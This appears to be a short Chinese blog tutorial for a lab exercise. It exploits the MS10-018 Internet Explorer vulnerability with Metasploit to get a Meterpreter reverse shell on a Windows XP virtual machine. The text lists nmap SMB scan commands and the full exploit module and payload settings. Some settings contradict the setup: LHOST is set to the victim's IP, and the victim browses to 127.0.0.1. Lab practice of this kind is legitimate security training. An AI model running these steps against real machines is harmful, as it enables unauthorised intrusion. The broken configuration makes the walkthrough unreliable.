渗透测试（MS10-018漏洞利用）

---

测试平台

使用平台：Kali（虚拟机）
使用工具：Metasploit
渗透目标：windows xp（虚拟机）
渗透目的：获得目标节点shell

---

测试步骤

1.前期准备（网络配置）

Kali 和 Windows XP 均使用 Host-Only仅主机 连接方式。
xp使用ipconfig，Kali使用ifconfig，获得并记录下对应IP（图略）【也可用Kali nmap 进行扫描】

同时，需关闭XP防火墙。
注意：做完这些操作后需用ping测试两机互通性。

2.查找漏洞是否可用

首先使用Nmap进行扫描，查看目标主机是否含有我们想要利用的漏洞，
可以使用的命令：

全部扫描：
nmap -P0 --script=smb-vuln-conficker 【IP】
nmap -P0 --script=smb-vuln-* 【IP】
具体扫描：
smb-vuln-ms10-018

进入MSF，查看MS10-018漏洞是否可用。
命令：

sudo msfconsole    进入MSF
search ms10_018    查找漏洞

3.利用漏洞进行监听

Kali开启监听
命令：

use exploit/windows/browser/ms10_018_ie_behaviors 
set payload windows/meterpreter/reverse_tcp
set SRVPORT 80
set URIPATH /
set LHOST 192.168.42.131     XP的IP
set LPORT 880
exploit

4.利用漏洞

在XP中打开浏览器，输入http://127.0.0.1/【图略】

至此，漏洞利用成功，获得XP shell，可以进行其余一系列操作。

---

总结

本文仅简单介绍了使用MSF进行简单的漏洞利用方法，作分享使用。
值得注意的是：为了漏洞利用成功，可尽量选择低版本的XP系统，保证漏洞存在。
有任何问题都可以在评论区和我交流~~